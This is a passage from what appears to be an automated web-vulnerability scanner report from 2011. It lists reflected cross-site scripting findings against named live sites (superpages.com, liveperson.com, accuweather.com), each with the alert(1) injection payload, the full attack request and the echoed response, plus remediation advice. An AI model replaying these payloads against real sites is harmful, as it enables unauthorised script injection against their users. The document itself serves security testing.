HTTP/1.1 404 /reviews/jsdbcb3&quot;-alert(1)-&quot;62acf7edf87/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=F0D826CA6507947C1A8E9F5CFFA2E340; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/ajaxreviews.js16b42&quot;-alert(1)-&quot;90ac00c6709
Server: Unspecified
Set-Cookie: JSESSIONID=0F2C1426EA2D2BBFB71984CD0E56C453; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379de"-alert(1)-"93123347901 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews379de"-alert(1)-"93123347901/js/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews379de&quot;-alert(1)-&quot;93123347901/js/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=4C4F8506785984A473A9B8524947C7EA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:51 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews379de"-alert(1)-"93123347901/js/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.655. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e628d"-alert(1)-"c967b65125d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jse628d"-alert(1)-"c967b65125d/logclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/jse628d&quot;-alert(1)-&quot;c967b65125d/logclick.js
Server: Unspecified
Set-Cookie: JSESSIONID=0AFB22647AF905FBE48BA572E2509F50; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jse628d"-alert(1)-"c967b65125d/logclick.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.656. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a3d"-alert(1)-"07047fb75a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/logclick.js66a3d&quot;-alert(1)-&quot;07047fb75a4
Server: Unspecified
Set-Cookie: JSESSIONID=1ACF9BB55F7200980D5EE25293B5CD5B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:15 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/logclick.js66a3d"-alert(1)-"07047fb75a4?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.657. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c297c"-alert(1)-"e7400485e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sec297c"-alert(1)-"e7400485e53/compositepage.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /sec297c&quot;-alert(1)-&quot;e7400485e53/compositepage.css
Server: Unspecified
Set-Cookie: JSESSIONID=396D5ADBD4D3142B9A631194C0B5FB09; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:54 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/sec297c"-alert(1)-"e7400485e53/compositepage.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.658. http://yellowpages.superpages.com/se/compositepage.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /se/compositepage.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b676"-alert(1)-"7c7f2a5b008 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /se/compositepage.css9b676"-alert(1)-"7c7f2a5b008 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /se/compositepage.css9b676&quot;-alert(1)-&quot;7c7f2a5b008
Server: Unspecified
Set-Cookie: JSESSIONID=EF454397094E37958A6FE11A378F5815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:02 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/se/compositepage.css9b676"-alert(1)-"7c7f2a5b008?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.659. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93874"-alert(1)-"5a42a034316 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp93874"-alert(1)-"5a42a034316/js/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp93874&quot;-alert(1)-&quot;5a42a034316/js/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=3158E03FC87257FBDA42942A3231293F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:23 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp93874"-alert(1)-"5a42a034316/js/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.660. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1fb9"-alert(1)-"1f6ee091e6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/jsa1fb9&quot;-alert(1)-&quot;1f6ee091e6a/addList.js
Server: Unspecified
Set-Cookie: JSESSIONID=D78C585477C06ABDFE12EC5A0B25B438; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:40 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/jsa1fb9"-alert(1)-"1f6ee091e6a/addList.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.661. http://yellowpages.superpages.com/yp/js/addList.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/addList.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3517"-alert(1)-"9ab61aa91ab was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/addList.jse3517&quot;-alert(1)-&quot;9ab61aa91ab
Server: Unspecified
Set-Cookie: JSESSIONID=672734BFB58DFD80247BC648ECB604A3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/addList.jse3517"-alert(1)-"9ab61aa91ab?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.662. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbf87"-alert(1)-"52571632a65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ypbbf87"-alert(1)-"52571632a65/js/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /ypbbf87&quot;-alert(1)-&quot;52571632a65/js/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=3503703CC4CACD6B2BC941DCABAA2129; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:22 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
ostServ = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/ypbbf87"-alert(1)-"52571632a65/js/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.663. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eeb8"-alert(1)-"e241847a207 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js4eeb8"-alert(1)-"e241847a207/showHide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js4eeb8&quot;-alert(1)-&quot;e241847a207/showHide.js
Server: Unspecified
Set-Cookie: JSESSIONID=15C47AD265D59EE717AEA5A2D2950B64; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:39 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
Serv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js4eeb8"-alert(1)-"e241847a207/showHide.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.664. http://yellowpages.superpages.com/yp/js/showHide.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /yp/js/showHide.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed951"-alert(1)-"e596cd16daa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yp/js/showHide.jsed951"-alert(1)-"e596cd16daa HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /yp/js/showHide.jsed951&quot;-alert(1)-&quot;e596cd16daa
Server: Unspecified
Set-Cookie: JSESSIONID=5BD8F1FDB942096A70CE97B3C572330D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:48 GMT
Cache-Control: private
Content-Length: 36073


                       <!--
       
       -->


                                   
...[SNIP]...
://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/yp/js/showHide.jsed951"-alert(1)-"e596cd16daa?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.665. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0c7f'-alert(1)-'d23b91857f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:47:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3686
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Dc0c7f%27%2Dalert%281%29%2D%27d23b91857f7; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=LLOJGOICFHNPLMCFLGEAMHAL; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=c0c7f'-alert(1)-'d23b91857f7');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

4.666. http://www.accuweather.com/index-radar.asp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.accuweather.com
Path:   /index-radar.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f5bc</script><script>alert(1)</script>da526c0c2c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index-radar.asp HTTP/1.1
Host: www.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1f5bc</script><script>alert(1)</script>da526c0c2c2

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Length: 64616
Content-Type: text/html
Cache-Control: public
Date: Thu, 03 Feb 2011 16:35:04 GMT
Connection: close
